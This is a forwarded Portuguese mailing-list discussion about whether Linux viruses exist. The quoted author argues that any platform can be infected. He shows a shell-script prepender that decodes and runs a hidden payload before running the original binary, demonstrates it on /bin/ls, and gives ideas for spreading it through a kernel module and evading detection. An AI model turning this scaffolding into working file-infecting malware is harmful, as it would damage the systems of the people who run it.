Assino outra lista e recebi o diálogo abaixo. É issomesmo??? Gostaria da opinião dos experts desta lista. (Fred, Leandro e outros mais). Ricardo Portella. > Fernando A. Ribeiro Fortes wrote: > > é coisa do passado, portanto ADEUS inunidade! ....", pra minha surpresa nunca > > tinha ouvido falar em vírus pra Linux > > Existe. E é fácil fazer. Veio na cabeça agora: > > Primeiro é preciso definir o que é vírus. Convencionou-se chamar de > virus a qualquer programa malicioso que infecte executáveis. Eu > particularmente coloco trojans, virus e worms na mesma categoria, acho > preciosismo diferenciá-los. Sabemos que existem worms e trojans para > Linux (Ramen, rootkits diversos, etc.). Faltou o virus que infecta > executavel. > > A maioria dos virus que infectam executaveis DOS/Windows escrevem a si > mesmos no início do arquivo executável (.exe, .com...). Em Linux é > relativamente fácil escrever um LKM que monitore entradas no /proc no > padrão /proc/<PID>/exe. Esta entrada contém o binário sendo executado no > momento pelo processo identificado por PID. Bastaria que este LKM > estivesse programado para escrever estas linhas no começo de cada > executável identificado: > > ##############corte######################## > #!/bin/sh > > uudecode > /tmp/.infect <<"EOF" > ---------------------------------------------------------------------------- ---- > EOF > chmod +x /tmp/.infect && /tmp/.infect && rm -f /tmp/.infect > tail +17 $0 >> /tmp/.prog_real > chmod +x /tmp/.prog_real > /tmp/.prog_real $@ > rm -f /tmp/.prog_real > exit 0 > ###############corte###################### > > > Debaixo da última linha vai o arquivo executável em questão. Como não > fiz o LKM, eu fiz o teste com o "/bin/ls" escrito embaixo destas linhas > com um simples "cat": > > thiago@nahar:/tmp$ ./ls-infectado /home/thiago/tmp -la > Ola, eu sou um virus. Se vc me rodasse como root, eu carregaria um LKM e > me espalharia. > total 44 > drwxr-xr-x 2 thiago thiago 4096 Aug 6 03:46 . > drwxr-xr-x 128 thiago thiago 8192 Aug 6 03:16 .. > -rw-r--r-- 1 thiago thiago 0 Aug 6 03:46 rip > -rw------- 1 thiago thiago 27008 Aug 6 03:45 terminais.txt > -rw------- 1 thiago thiago 2424 Aug 6 03:45 textdump.pl > > > Isso pode ser bastante melhorado adicionando um número randomico ao nome > do arquivo .prog_real para evitar "colisoes" quando se rodam varios > programas ao mesmo tempo. A linha uuencodada conteria o LKM. O exemplo é > bem tosco, poderia ser feito em C, assim o "file" continuaria achando > que o arquivo modificado é um executável e não um shell script, só > podendo ser identificado pela diferença de tamanho do arquivo. Mas no > geral isso também seria util pois eu não vejo ninguém no Windows abrindo > seus executáveis para saber se são binários mesmo ou não. > > É basicamente o mesmo principio dos virus para Windows. Se vc copiar um > destes executáveis para outra máquina com CONFIG_MODVERSIONS habilitado > ele rodará e infectará os executáveis desta máquina tambem. Logicamente, > o vírus só poderá carregar o LKM se for executado como root. Mas isso > não é muito diferente do Windows, onde para infectar arquivos de sistema > o usuário teria que rodá-lo como Administrador. > > Viu? Não existe bala de prata. > > > minha parte, mais é que entrei numa briga ferrenha com o dito cujo e acabei > > Fez mal. > > É possível escrever vírus para qualquer plataforma que permita a > execução de código arbitrário. A pouca disseminação de pragas para > Linux, assim como Mac e outros deve-se simplesmente ao fato deles serem > menos visados. > > thiago > > -- > Falar mal das pessoas é muito mais gratificante do que falar bem. Eu, se > pudesse, só falaria mal. (Diogo Mainardi) > > -------------------------------------------------------------------------- - > Esta lista é patrocinada pela Conectiva S.A. Visite http://www.conectiva.com.br > > Arquivo: http://bazar2.conectiva.com.br/mailman/listinfo/linux-br > Regras de utilização da lista: http://linux-br.conectiva.com.br > FAQ: http://www.zago.eti.br/menu.html >
Attachment:
-.dat
Description: Binary data